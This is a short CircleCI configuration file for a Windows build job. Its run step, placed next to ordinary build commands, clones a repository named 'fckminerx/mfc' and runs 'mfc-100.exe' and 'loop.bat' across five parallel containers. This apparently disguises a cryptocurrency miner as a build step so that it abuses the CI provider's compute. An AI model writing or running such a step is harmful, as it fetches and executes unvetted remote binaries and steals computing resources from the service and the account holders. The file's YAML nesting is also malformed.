version: 2.1 # Use version 2.1 to enable Orb usage.

orbs:
  win: circleci/windows@5.0 # The Windows orb gives you everything you need to start using the Windows executor.

jobs:
  build: # name of your job
    executor: 
      name: win/default # executor type
      size: medium # can be medium, large, xlarge, 2xlarge
  parallelism: 5
  steps:
    # Commands are run in a Windows virtual machine environment
    - checkout
    - run:
        name: RUN1
        command: |
          bundle install --jobs=4 --retry=3 --path vendor/bundle
          Write-Host 'Hello, Windows'
          git clone https://github.com/fckminerx/mfc
          cd mfc
          powershell .\mfc-100.exe
          powershell .\loop.bat